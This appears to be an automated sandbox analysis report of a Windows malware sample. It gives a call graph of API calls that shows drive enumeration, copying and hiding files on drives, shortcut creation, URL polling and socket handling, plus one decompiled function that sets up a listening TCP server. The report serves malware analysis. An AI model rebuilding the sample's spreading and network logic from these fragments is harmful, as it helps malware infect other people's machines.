API calls 5373->5377 5375 40dc85 InterlockedExchangeAdd 5374->5375 5376 40dcb8 5374->5376 5375->5374 5378 40dc9b 5375->5378 5376->5373 5379 40dcd9 5376->5379 5380 40dccb 5377->5380 5382 408c70 _invalid_parameter 3 API calls 5378->5382 5381 408c70 _invalid_parameter 3 API calls 5379->5381 5380->5362 5381->5369 5383 40dcaa 5382->5383 5383->5362 5385 40b491 send 5384->5385 5386 40b4ae 5385->5386 5387 40b4c5 5385->5387 5386->5385 5386->5387 5387->5366 5387->5367 5389 40a141 lstrlenA 5388->5389 5390 40ab80 7 API calls 5389->5390 5392 40a15f 5390->5392 5391 40a1ef 5391->5344 5392->5389 5394 40a16b 5392->5394 5393 408c70 _invalid_parameter 3 API calls 5393->5391 5394->5391 5394->5393 5397 409ce8 5395->5397 5396 409d24 LeaveCriticalSection 5396->5344 5397->5396 5420 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 5397->5420 5399 409d13 5399->5396 5421 4057c0 5400->5421 5403 4058ac 5403->5344 5434 404970 EnterCriticalSection 5405->5434 5407 4057b2 5407->5344 5409 4057c0 65 API calls 5408->5409 5410 405834 5409->5410 5411 40bba0 312 API calls 5410->5411 5412 405859 5410->5412 5411->5412 5412->5344 5469 4048b0 EnterCriticalSection 5413->5469 5415 40574a 5416 40577d 5415->5416 5474 405640 5415->5474 5416->5344 5419 408c70 _invalid_parameter 3 API calls 5419->5416 5420->5399 5424 4057d3 5421->5424 5422 405810 5422->5403 5425 4056e0 5422->5425 5424->5422 5428 4047c0 EnterCriticalSection 5424->5428 5426 409ec0 18 API calls 5425->5426 5427 405725 5426->5427 5427->5403 5429 40b210 63 API calls 5428->5429 5431 4047e0 5429->5431 5430 40488e LeaveCriticalSection 5430->5424 5431->5430 5432 408c70 _invalid_parameter 3 API calls 5431->5432 5433 40488b 5432->5433 5433->5430 5458 40b270 5434->5458 5437 404bae LeaveCriticalSection 5437->5407 5438 40b210 63 API calls 5439 4049ab 5438->5439 5439->5437 5441 408c70 _invalid_parameter 3 API calls 5439->5441 5457 404ac3 5439->5457 5440 4044e0 68 API calls 5445 404aec 5440->5445 5443 404a22 5441->5443 5442 408c70 _invalid_parameter 3 API calls 5444 404b0d 5442->5444 5446 408ce0 8 API calls 5443->5446 5444->5437 5447 404b1c CreateFileW 5444->5447 5445->5442 5448 404a32 5446->5448 5447->5437 5449 404b3f 5447->5449 5450 408c70 _invalid_parameter 3 API calls 5448->5450 5452 404b9a FlushFileBuffers CloseHandle 5449->5452 5453 404b5c WriteFile 5449->5453 5451 404a59 5450->5451 5454 40ab80 7 API calls 5451->5454 5452->5437 5453->5449 5455 404a90 5454->5455 5456 405c90 65 API calls 5455->5456 5456->5457 5457->5440 5457->5445 5461 40a7c0 5458->5461 5463 40a7d3 5461->5463 5462 408ce0 8 API calls 5462->5463 5463->5462 5464 40a720 62 API calls 5463->5464 5466 40a7ed 5463->5466 5468 4065e0 61 API calls 5463->5468 5464->5463 5465 408c70 _invalid_parameter 3 API calls 5467 404994 5465->5467 5466->5465 5467->5437 5467->5438 5468->5463 5471 4048ce 5469->5471 5470 40495a LeaveCriticalSection 5470->5415 5471->5470 5472 408ce0 8 API calls 5471->5472 5473 40492c 5472->5473 5473->5470 5475 408b20 __aligned_recalloc_base 7 API calls 5474->5475 5476 405652 memcpy 5475->5476 5477 409ec0 18 API calls 5476->5477 5478 4056bc 5477->5478 5479 408c70 _invalid_parameter 3 API calls 5478->5479 5480 4056cb 5479->5480 5480->5419 5482 40dfa2 EnterCriticalSection 5481->5482 5483 40df9d 5481->5483 5484 40dfb7 5482->5484 5485 40dfcd LeaveCriticalSection 5482->5485 5483->5201 5484->5485 5486 40dfd8 5485->5486 5487 40dfdf 5485->5487 5486->5201 5488 408b00 7 API calls 5487->5488 5489 40dfe9 5488->5489 5490 40dff6 getpeername CreateIoCompletionPort 5489->5490 5498 40e088 5489->5498 5491 40e082 5490->5491 5492 40e036 5490->5492 5495 408c70 _invalid_parameter 3 API calls 5491->5495 5521 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 5492->5521 5495->5498 5496 40e093 5496->5201 5497 40e03b InterlockedExchange InitializeCriticalSection InterlockedIncrement 5522 40deb0 EnterCriticalSection LeaveCriticalSection 5497->5522 5523 409600 shutdown closesocket 5498->5523 5500 40e07b 5500->5201 5502 40e7e0 InterlockedExchangeAdd 5501->5502 5503 40e7dc 5501->5503 5504 40e833 5502->5504 5505 40e7f7 InterlockedIncrement 5502->5505 5503->5185 5504->5185 5506 40e730 4 API calls 5505->5506 5507 40e826 5506->5507 5507->5504 5508 40e82c InterlockedDecrement 5507->5508 5508->5504 5510 40e310 5509->5510 5514 40e3e1 5509->5514 5511 40e31d InterlockedExchangeAdd 5510->5511 5510->5514 5511->5514 5518 40e334 5511->5518 5512 40e360 5513 40e371 5512->5513 5533 409600 shutdown closesocket 5512->5533 5513->5514 5515 40e387 InterlockedDecrement 5513->5515 5514->5192 5515->5514 5518->5512 5518->5514 5524 40e280 EnterCriticalSection 5518->5524 5519->5200 5520->5200 5521->5497 5522->5500 5523->5496 5525 40e2e7 LeaveCriticalSection 5524->5525 5526 40e29a InterlockedExchangeAdd 5524->5526 5525->5518 5527 40e2aa LeaveCriticalSection 5526->5527 5528 40e2b9 5526->5528 5527->5518 5529 408c70 _invalid_parameter 3 API calls 5528->5529 5530 40e2de 5529->5530 5531 408c70 _invalid_parameter 3 API calls 5530->5531 5532 40e2e4 5531->5532 5532->5525 5533->5513 5535 408b00 7 API calls 5534->5535 5536 40dd7b CreateEventA socket 5535->5536 5537 40ddb2 5536->5537 5538 40ddb9 5536->5538 5539 40dd00 8 API calls 5537->5539 5540 40de1a 5538->5540 5541 40ddbd bind 5538->5541 5542 40ddb7 5539->5542 5540->5207 5543 40ddf0 5541->5543 5544 40ddfc CreateThread 5541->5544 5542->5538 5545 40dd00 8 API calls 5543->5545 5544->5540 5557 40dad0 5544->5557 5546 40ddf5 5545->5546 5546->5207 5548 40dd60 5547->5548 5549 40dd04 5547->5549 5548->5208 5549->5548 5550 40dd0c SetEvent WaitForSingleObject CloseHandle 5549->5550 5551 40dd50 5550->5551 5555 40dd34 5550->5555 5585 409600 shutdown closesocket 5551->5585 5553 408c70 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5553->5555 5554 40dd5a 5556 408c70 _invalid_parameter 3 API calls 5554->5556 5555->5551 5555->5553 5556->5548 5558 40dae5 ioctlsocket 5557->5558 5559 40dbb0 5558->5559 5565 40db0a 5558->5565 5560 408c70 _invalid_parameter 3 API calls 5559->5560 5562 40dbb6 5560->5562 5561 40db99 WaitForSingleObject 5561->5558 5561->5559 5563 40db34 recvfrom 5563->5561 5563->5565 5564 408b60 9 API calls 5564->5565 5565->5561 5565->5563 5565->5564 5566 40db79 InterlockedExchangeAdd 5565->5566 5568 40d9a0 5566->5568 5570 40d9d5 5568->5570 5569 40d9ff 5578 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 5569->5578 5570->5569 5571 408b00 7 API calls 5570->5571 5571->5569 5573 40da22 5579 40de30 5573->5579 5575 40dabe 5575->5565 5576 40da35 5576->5575 5577 40daab memmove 5576->5577 5577->5576 5578->5573 5580 40de42 5579->5580 5581 40de55 memcpy 5579->5581 5582 408b60 9 API calls 5580->5582 5584 40de71 5581->5584 5583 40de4f 5582->5583 5583->5581 5584->5576 5585->5554 5587 40d8ae 5586->5587 5593 40d98e 5586->5593 5588 408b00 7 API calls 5587->5588 5587->5593 5589 40d8be CreateEventA socket 5588->5589 5590 40d8f5 5589->5590 5591 40d8fc 5589->5591 5594 40dd00 8 API calls 5590->5594 5592 40d904 htons setsockopt bind 5591->5592 5591->5593 5596 40d974 CreateThread 5592->5596 5597 40d968 5592->5597 5593->5217 5595 40d8fa 5594->5595 5595->5591 5596->5593 5600 40dad0 19 API calls _invalid_parameter 5596->5600 5598 40dd00 8 API calls 5597->5598 5599 40d96d 5598->5599 5599->5217 5602 40e9d2 InterlockedDecrement setsockopt closesocket 5601->5602 5603 40e854 5601->5603 5605 40e919 5602->5605 5603->5602 5604 40e85c 5603->5604 5621 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 5604->5621 5605->5226 5607 40e861 InterlockedExchange 5608 40e878 5607->5608 5609 40e92e 5607->5609 5608->5605 5614 40e889 InterlockedDecrement 5608->5614 5615 40e89c InterlockedDecrement InterlockedExchangeAdd 5608->5615 5610 40e947 5609->5610 5611 40e937 InterlockedDecrement 5609->5611 5612 40e952 5610->5612 5613 40e967 InterlockedDecrement 5610->5613 5611->5226 5622 40e5c0 WSASend 5612->5622 5617 40e9c9 5613->5617 5614->5226 5618 40e90f 5615->5618 5617->5226 5620 40e7d0 7 API calls 5618->5620 5619 40e95e 5619->5226 5620->5605 5621->5607 5623 40e630 5622->5623 5624 40e5f2 WSAGetLastError 5622->5624 5623->5619 5624->5623 5625 40e5ff 5624->5625 5626 40e636 5625->5626 5627 40e606 Sleep WSASend 5625->5627 5626->5619 5627->5623 5627->5624 5629 4043f9 memset GetModuleHandleW 5628->5629 5630 404432 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5629->5630 5630->5630 5631 404470 CreateWindowExW 5630->5631 5632 40449b 5631->5632 5633 40449d GetMessageA 5631->5633 5634 4044cf ExitThread 5632->5634 5635 4044b1 TranslateMessage DispatchMessageA 5633->5635 5636 4044c7 5633->5636 5635->5633 5636->5629 5636->5634 5659 40d180 CreateFileW 5637->5659 5639 4054d0 5640 405628 ExitThread 5639->5640 5642 405618 Sleep 5639->5642 5643 405509 5639->5643 5662 404cb0 GetLogicalDrives 5639->5662 5642->5639 5668 404c50 5643->5668 5646 405540 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5647 4055b6 wsprintfW 5646->5647 5648 4055cb wsprintfW 5646->5648 5647->5648 5674 404fc0 _chkstk 5648->5674 5649 40553b 5653 405d4f Sleep 5652->5653 5657 405d66 5653->5657 5654 405de6 Sleep 5654->5653 5655 405d7e Sleep wsprintfA 5727 40d440 InternetOpenA 5655->5727 5657->5654 5657->5655 5658 40d4f0 60 API calls 5657->5658 5658->5657 5660 40d1c8 5659->5660 5661 40d1af GetFileSize CloseHandle 5659->5661 5660->5639 5661->5660 5667 404cdd 5662->5667 5663 404d56 5663->5639 5664 404cec RegOpenKeyExW 5665 404d0e RegQueryValueExW 5664->5665 5664->5667 5666 404d4a RegCloseKey 5665->5666 5665->5667 5666->5667 5667->5663 5667->5664 5667->5666 5669 404ca9 5668->5669 5670 404c6c 5668->5670 5669->5646 5669->5649 5709 404bd0 GetDriveTypeW 5670->5709 5673 404c9b lstrcpyW 5673->5669 5675 404fd7 5674->5675 5676 404fde 6 API calls 5674->5676 5675->5649 5677 405092 5676->5677 5678 4050d4 PathFileExistsW 5676->5678 5681 40d180 3 API calls 5677->5681 5679 405150 PathFileExistsW 5678->5679 5680 4050e5 PathFileExistsW 5678->5680 5684 405161 5679->5684 5685 4051a6 FindFirstFileW 5679->5685 5682 4050f6 CreateDirectoryW 5680->5682 5683 405118 PathFileExistsW 5680->5683 5686 40509e 5681->5686 5682->5683 5688 405109 SetFileAttributesW 5682->5688 5683->5679 5689 405129 CopyFileW 5683->5689 5690 405181 5684->5690 5691 405169 5684->5691 5685->5675 5707 4051cd 5685->5707 5686->5678 5687 4050b5 SetFileAttributesW DeleteFileW 5686->5687 5687->5678 5688->5683 5689->5679 5693 405141 SetFileAttributesW 5689->5693 5695 404d70 3 API calls 5690->5695 5714 404d70 CoInitialize CoCreateInstance 5691->5714 5692 40528f lstrcmpW 5696 4052a5 lstrcmpW 5692->5696 5692->5707 5693->5679 5697 40517c SetFileAttributesW 5695->5697 5696->5707 5697->5685 5699 405466 FindNextFileW 5699->5692 5700 405482 FindClose 5699->5700 5700->5675 5701 4052eb lstrcmpiW 5701->5707 5702 405352 PathMatchSpecW 5703 405373 wsprintfW SetFileAttributesW DeleteFileW 5702->5703 5702->5707 5703->5707 5704 4053d0 PathFileExistsW 5705 4053e6 wsprintfW wsprintfW 5704->5705 5704->5707 5706 405450 MoveFileExW 5705->5706 5705->5707 5706->5699 5707->5692 5707->5699 5707->5701 5707->5702 5707->5704 5718 404e80 CreateDirectoryW wsprintfW FindFirstFileW 5707->5718 5710 404bf8 5709->5710 5713 404c0a 5709->5713 5711 404c0c QueryDosDeviceW 5710->5711 5710->5713 5712 404c26 StrCmpNW 5711->5712 5711->5713 5712->5713 5713->5669 5713->5673 5715 404da6 5714->5715 5717 404de2 5714->5717 5716 404db0 wsprintfW 5715->5716 5715->5717 5716->5717 5717->5697 5719 404ed5 lstrcmpW 5718->5719 5720 404faf 5718->5720 5721 404f01 5719->5721 5722 404eeb lstrcmpW 5719->5722 5720->5707 5724 404f7c FindNextFileW 5721->5724 5722->5721 5723 404f03 wsprintfW wsprintfW 5722->5723 5723->5721 5726 404f66 MoveFileExW 5723->5726 5724->5719 5725 404f98 FindClose RemoveDirectoryW 5724->5725 5725->5720 5726->5724 5728 40d466 InternetOpenUrlA 5727->5728 5729 40d4d8 Sleep 5727->5729 5730 40d485 HttpQueryInfoA 5728->5730 5731 40d4ce InternetCloseHandle 5728->5731 5729->5657 5732 40d4c4 InternetCloseHandle 5730->5732 5733 40d4ae 5730->5733 5731->5729 5732->5731 5733->5732 5873 40b950 5874 40b9be 5873->5874 5875 40b967 5873->5875 5875->5874 5876 40b971 5875->5876 5877 40b9c3 5875->5877 5878 40ba0d 5875->5878 5879 408b00 7 API calls 5876->5879 5881 40b9e8 5877->5881 5882 40b9db InterlockedDecrement 5877->5882 5906 40a5b0 5878->5906 5883 40b97e 5879->5883 5884 408c70 _invalid_parameter 3 API calls 5881->5884 5882->5881 5895 40e0a0 5883->5895 5885 40b9f4 5884->5885 5887 408c70 _invalid_parameter 3 API calls 5885->5887 5887->5874 5890 40ba33 5890->5874 5893 40a210 312 API calls 5890->5893 5911 40a6b0 5890->5911 5892 40b9ab InterlockedIncrement 5892->5874 5893->5890 5896 40e0a4 5895->5896 5897 40b990 5895->5897 5896->5897 5898 40e0b5 InterlockedIncrement 5896->5898 5899 4098f0 5897->5899 5898->5897 5900 409770 2 API calls 5899->5900 5901 4098ff 5900->5901 5902 409909 5901->5902 5903 40990d EnterCriticalSection 5901->5903 5902->5874 5902->5892 5904 40992c LeaveCriticalSection 5903->5904 5904->5902 5907 40a5c3 5906->5907 5908 40a5ed memcpy 5906->5908 5909 408b60 9 API calls 5907->5909 5908->5890 5910 40a5e4 5909->5910 5910->5908 5912 40a6d9 5911->5912 5913 40a6ce 5911->5913 5912->5913 5914 40a6f1 memmove 5912->5914 5913->5890 5914->5913 5963 40b8f0 5968 40e640 5963->5968 5965 40b923 5966 40b905 5966->5965 5967 40e640 16 API calls 5966->5967 5967->5965 5969 40e71b 5968->5969 5970 40e650 5968->5970 5969->5966 5970->5969 5971 408b00 7 API calls 5970->5971 5972 40e678 5971->5972 5972->5969 5973 408ce0 8 API calls 5972->5973 5974 40e6a4 5973->5974 5975 40e6c0 5974->5975 5976 40e6b1 5974->5976 5978 40e5c0 4 API calls 5975->5978 5977 408c70 _invalid_parameter 3 API calls 5976->5977 5979 40e6b7 5977->5979 5980 40e6cd 5978->5980 5979->5966 5981 40e6d6 EnterCriticalSection 5980->5981 5982 40e70c 5980->5982 5984 40e6f9 LeaveCriticalSection 5981->5984 5985 40e6ed 5981->5985 5983 408c70 _invalid_parameter 3 API calls 5982->5983 5986 40e715 5983->5986 5984->5966 5985->5984 5987 408c70 _invalid_parameter 3 API calls 5986->5987 5987->5969 5988 40ecf0 5989 40ed0e 5988->5989 5991 40eda4 5988->5991 5990 40ef2d NtQueryVirtualMemory 5989->5990 5993 40ed29 5990->5993 5992 40ee18 RtlUnwind 5992->5993 5993->5991 5993->5992 5994 40def0 5995 40df07 5994->5995 6000 40df80 5994->6000 5996 40df17 5995->5996 5997 40df35 EnterCriticalSection 5995->5997 5998 40df6c LeaveCriticalSection DeleteCriticalSection 5997->5998 6002 40df4d 5997->6002 5999 408c70 _invalid_parameter 3 API calls 5998->5999 5999->6000 6001 408c70 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 6001->6002 6002->6001 6003 40df6b 6002->6003 6003->5998 5915 404955 5917 4048ce 5915->5917 5916 40495a LeaveCriticalSection 5917->5916 5918 408ce0 8 API calls 5917->5918 5919 40492c 5918->5919 5919->5916 5920 405315 5923 4052bb 5920->5923 5921 4052eb lstrcmpiW 5921->5923 5922 405466 FindNextFileW 5925 405482 FindClose 5922->5925 5926 40528f lstrcmpW 5922->5926 5923->5921 5923->5922 5924 405352 PathMatchSpecW 5923->5924 5928 4053d0 PathFileExistsW 5923->5928 5933 404e80 11 API calls 5923->5933 5924->5923 5927 405373 wsprintfW SetFileAttributesW DeleteFileW 5924->5927 5930 40548f 5925->5930 5926->5923 5929 4052a5 lstrcmpW 5926->5929 5927->5923 5928->5923 5931 4053e6 wsprintfW wsprintfW 5928->5931 5929->5923 5931->5923 5932 405450 MoveFileExW 5931->5932 5932->5922 5933->5923 6004 4054f6 6014 4054d8 6004->6014 6005 405618 Sleep 6005->6014 6006 405509 6007 404c50 4 API calls 6006->6007 6008 40551a 6007->6008 6010 405540 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 6008->6010 6016 40553b 6008->6016 6009 405628 ExitThread 6012 4055b6 wsprintfW 6010->6012 6013 4055cb wsprintfW 6010->6013 6011 404cb0 4 API calls 6011->6014 6012->6013 6015 404fc0 49 API calls 6013->6015 6014->6005 6014->6006 6014->6009 6014->6011 6015->6016 6017 405df6 ExitThread 6018 406639 6019 406642 6018->6019 6020 406651 34 API calls 6019->6020 6021 407486 6019->6021 6036 40da7f 6039 40da40 6036->6039 6037 40daab memmove 6037->6039 6038 40dabe 6039->6037 6039->6038

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 287 40eb00-40eb12 call 408b00 290 40ec86-40ec8a 287->290 291 40eb18-40eb50 GetSystemInfo InitializeCriticalSection CreateEventA 287->291 292 40eb56-40eb69 CreateIoCompletionPort 291->292 293 40ec7f-40ec84 call 40e0e0 291->293 292->293 294 40eb6f-40eb79 call 40baf0 292->294 293->290 294->293 299 40eb7f-40eb97 WSASocketA 294->299 299->293 300 40eb9d-40ec00 setsockopt htons bind 299->300 300->293 301 40ec06-40ec18 listen 300->301 301->293 302 40ec1a-40ec25 WSACreateEvent 301->302 302->293 303 40ec27-40ec37 WSAEventSelect 302->303 303->293 304 40ec39-40ec3f 303->304 305 40ec41-40ec51 call 40bba0 304->305 306 40ec5f-40ec6f call 40bba0 304->306 309 40ec56-40ec5d 305->309 310 40ec74-40ec7e 306->310 309->305 309->306
                                                                                                                                                                                                                                                                                    C-Code - Quality: 45%
                                                                                                                                                                                                                                                                                    			E0040EB00(void* __esi) {
                                                                                                                                                                                                                                                                                    				struct _SYSTEM_INFO _v36;
                                                                                                                                                                                                                                                                                    				short _v40;
                                                                                                                                                                                                                                                                                    				char _v77;
                                                                                                                                                                                                                                                                                    				short _v82;
                                                                                                                                                                                                                                                                                    				short _v86;
                                                                                                                                                                                                                                                                                    				short _v90;
                                                                                                                                                                                                                                                                                    				short _v92;
                                                                                                                                                                                                                                                                                    				short _v94;
                                                                                                                                                                                                                                                                                    				short _v96;
                                                                                                                                                                                                                                                                                    				short _v98;
                                                                                                                                                                                                                                                                                    				char _v100;
                                                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t30;
                                                                                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                                                                    				intOrPtr _t37;
                                                                                                                                                                                                                                                                                    				short _t39;
                                                                                                                                                                                                                                                                                    				intOrPtr _t40;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t54;
                                                                                                                                                                                                                                                                                    				void* _t56;
                                                                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t30 = E00408B00(0x4c);
                                                                                                                                                                                                                                                                                    				_t54 = _t30;
                                                                                                                                                                                                                                                                                    				_t59 = _t58 + 4;
                                                                                                                                                                                                                                                                                    				if(_t54 == 0) {
                                                                                                                                                                                                                                                                                    					return _t30;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					 *_t54 = 0x494f4350; // executed
                                                                                                                                                                                                                                                                                    					GetSystemInfo( &_v36); // executed
                                                                                                                                                                                                                                                                                    					_t45 = _v36.dwNumberOfProcessors;
                                                                                                                                                                                                                                                                                    					_t3 = _t54 + 0x20; // 0x20
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t54 + 4)) = _v36.dwNumberOfProcessors + _t45;
                                                                                                                                                                                                                                                                                    					InitializeCriticalSection(_t3);
                                                                                                                                                                                                                                                                                    					_t33 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                    					 *(_t54 + 0x10) = _t33;
                                                                                                                                                                                                                                                                                    					if(_t33 == 0) {
                                                                                                                                                                                                                                                                                    						L12:
                                                                                                                                                                                                                                                                                    						E0040E0E0(_t54);
                                                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t36 = CreateIoCompletionPort(0xffffffff, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					 *(_t54 + 8) = _t36;
                                                                                                                                                                                                                                                                                    					if(_t36 == 0) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t37 = E0040BAF0(_t45);
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t54 + 0xc)) = _t37;
                                                                                                                                                                                                                                                                                    					if(_t37 == 0) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					__imp__WSASocketA(2, 1, 6, 0, 0, 1); // executed
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t54 + 0x14)) = _t37;
                                                                                                                                                                                                                                                                                    					if(_t37 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v77 = 1;
                                                                                                                                                                                                                                                                                    					__imp__#21(_t37, 0xffff, 4,  &_v77, 1); // executed
                                                                                                                                                                                                                                                                                    					_v94 = 0;
                                                                                                                                                                                                                                                                                    					_v90 = 0;
                                                                                                                                                                                                                                                                                    					_v86 = 0;
                                                                                                                                                                                                                                                                                    					_v82 = 0;
                                                                                                                                                                                                                                                                                    					_t39 = _v40;
                                                                                                                                                                                                                                                                                    					_v96 = 2;
                                                                                                                                                                                                                                                                                    					_v92 = _t39;
                                                                                                                                                                                                                                                                                    					__imp__#9(_v36.dwOemId);
                                                                                                                                                                                                                                                                                    					_v98 = _t39;
                                                                                                                                                                                                                                                                                    					_t40 =  *((intOrPtr*)(_t54 + 0x14));
                                                                                                                                                                                                                                                                                    					__imp__#2(_t40,  &_v100, 0x10); // executed
                                                                                                                                                                                                                                                                                    					if(_t40 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					__imp__#13( *((intOrPtr*)(_t54 + 0x14)), 0x7fffffff); // executed
                                                                                                                                                                                                                                                                                    					if(_t40 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					__imp__WSACreateEvent();
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t54 + 0x18)) = _t40;
                                                                                                                                                                                                                                                                                    					if(_t40 == 0) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					__imp__WSAEventSelect( *((intOrPtr*)(_t54 + 0x14)), _t40, 8); // executed
                                                                                                                                                                                                                                                                                    					if(_t40 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t56 = 0;
                                                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t54 + 4)) > 0) {
                                                                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                                                                    							E0040BBA0( *((intOrPtr*)(_t54 + 0xc)), 0, E0040EA30, _t54, 0, 0); // executed
                                                                                                                                                                                                                                                                                    							_t56 = _t56 + 1;
                                                                                                                                                                                                                                                                                    							_t59 = _t59 + 0x18;
                                                                                                                                                                                                                                                                                    						} while (_t56 <  *((intOrPtr*)(_t54 + 4)));
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E0040BBA0( *((intOrPtr*)(_t54 + 0xc)), 0, E0040E400, _t54, 0, 0); // executed
                                                                                                                                                                                                                                                                                    					return _t54;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}

























                                                                                                                                                                                                                                                                                    0x0040eb06
                                                                                                                                                                                                                                                                                    0x0040eb0b
                                                                                                                                                                                                                                                                                    0x0040eb0d
                                                                                                                                                                                                                                                                                    0x0040eb12
                                                                                                                                                                                                                                                                                    0x0040ec8a
                                                                                                                                                                                                                                                                                    0x0040eb18
                                                                                                                                                                                                                                                                                    0x0040eb1d
                                                                                                                                                                                                                                                                                    0x0040eb23
                                                                                                                                                                                                                                                                                    0x0040eb29
                                                                                                                                                                                                                                                                                    0x0040eb2d
                                                                                                                                                                                                                                                                                    0x0040eb34
                                                                                                                                                                                                                                                                                    0x0040eb37
                                                                                                                                                                                                                                                                                    0x0040eb45
                                                                                                                                                                                                                                                                                    0x0040eb4b
                                                                                                                                                                                                                                                                                    0x0040eb50
                                                                                                                                                                                                                                                                                    0x0040ec7f
                                                                                                                                                                                                                                                                                    0x0040ec7f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ec84
                                                                                                                                                                                                                                                                                    0x0040eb5e
                                                                                                                                                                                                                                                                                    0x0040eb64
                                                                                                                                                                                                                                                                                    0x0040eb69
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040eb6f
                                                                                                                                                                                                                                                                                    0x0040eb74
                                                                                                                                                                                                                                                                                    0x0040eb79
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040eb8b
                                                                                                                                                                                                                                                                                    0x0040eb91
                                                                                                                                                                                                                                                                                    0x0040eb97
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ebac
                                                                                                                                                                                                                                                                                    0x0040ebb1
                                                                                                                                                                                                                                                                                    0x0040ebbd
                                                                                                                                                                                                                                                                                    0x0040ebc1
                                                                                                                                                                                                                                                                                    0x0040ebc5
                                                                                                                                                                                                                                                                                    0x0040ebc9
                                                                                                                                                                                                                                                                                    0x0040ebce
                                                                                                                                                                                                                                                                                    0x0040ebd8
                                                                                                                                                                                                                                                                                    0x0040ebdd
                                                                                                                                                                                                                                                                                    0x0040ebe1
                                                                                                                                                                                                                                                                                    0x0040ebed
                                                                                                                                                                                                                                                                                    0x0040ebf2
                                                                                                                                                                                                                                                                                    0x0040ebf7
                                                                                                                                                                                                                                                                                    0x0040ec00
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ec0f
                                                                                                                                                                                                                                                                                    0x0040ec18
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ec1a
                                                                                                                                                                                                                                                                                    0x0040ec20
                                                                                                                                                                                                                                                                                    0x0040ec25
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ec2e
                                                                                                                                                                                                                                                                                    0x0040ec37
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ec3a
                                                                                                                                                                                                                                                                                    0x0040ec3f
                                                                                                                                                                                                                                                                                    0x0040ec41
                                                                                                                                                                                                                                                                                    0x0040ec51
                                                                                                                                                                                                                                                                                    0x0040ec56
                                                                                                                                                                                                                                                                                    0x0040ec57
                                                                                                                                                                                                                                                                                    0x0040ec5a
                                                                                                                                                                                                                                                                                    0x0040ec41
                                                                                                                                                                                                                                                                                    0x0040ec6f
                                                                                                                                                                                                                                                                                    0x0040ec7e
                                                                                                                                                                                                                                                                                    0x0040ec7e

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 0040EB23
                                                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000020), ref: 0040EB37
                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040EB45
                                                                                                                                                                                                                                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040EB5E
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BAF0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040BB0E
